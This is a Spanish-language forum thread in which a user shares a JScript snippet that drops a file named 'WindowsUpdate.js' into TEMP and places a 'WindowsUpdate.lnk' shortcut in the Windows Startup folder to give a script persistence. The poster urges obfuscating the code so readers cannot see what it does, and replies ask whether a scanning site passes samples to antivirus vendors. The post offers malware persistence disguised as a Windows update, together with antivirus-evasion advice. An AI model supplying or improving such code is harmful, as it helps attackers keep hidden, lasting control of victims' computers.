Javascript file drop and startup

Iniciado por arduo, Mayo 25, 2022, 04:13:04 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Hola buenas chaval@s.

Bueno me presento soy arduo, en udtools q en paz descanse, y en indetectables tenia otro nick, bueno siempre fui modder, aunq nunca tuve ese rango, me gusta modificar las cosas, y hoy os voy a dejar un script en javascript que modifique hace 2 años, nunca lo publique en ningun lado, basicamente cogi codigo de diferentes scripts y cree ese, esto lo q hace es crear un archivo.js en TEMP y un archivo.lnk en STARTUP, añadirle persistencia hablando en plata. A dia de hoy este es el scan.



Aviso que tiene mas de un error, corregirlo... Los errores son muy simples, si posteo mas cosas se iran agrandando xD
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Código: php
var strr = new ActiveXObject("Scripting.FileSystemObject")
var strtwo = WScript.CreateObject("WScript.Shell");
var temp = strtwo.ExpandEnvironmentStrings("TEMP");

var strtres = strr.CreateTextFile(temp +"WindowsUpdate.js", true);
strtres.WriteLine("Ur js code");
strtres.Close();

strcinco = strtwo.SpecialFolders("Startup");
var strcuatro = strtwo.CreateShortcut(strcinco + "WindowsUpdate.lnk");
strcuatro.TargetPath = WScript.ScriptFullName;
strcuatro.Description = "Shortcut WindowsUpdate"
strcuatro.WorkingDirectory = temp +"/WindowsUpdate.js";
strcuatro.Save();

Se me olvidaba, no se si esta en la seccion correcta, y otra cosa, obfuscar el codigo antes de usarlo, q cualquiera q lo lea sabe q hace.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Se me olvidaba, no se si esta en la seccion correcta, y otra cosa, obfuscar el codigo antes de usarlo, q cualquiera q lo lea sabe q hace.

¿La web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta comparte muestras con las compañias de AV?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¿La web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta comparte muestras con las compañias de AV?


Es común la retroalimentación y convenios entre estos tipos de sitios y las compañías de AV.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta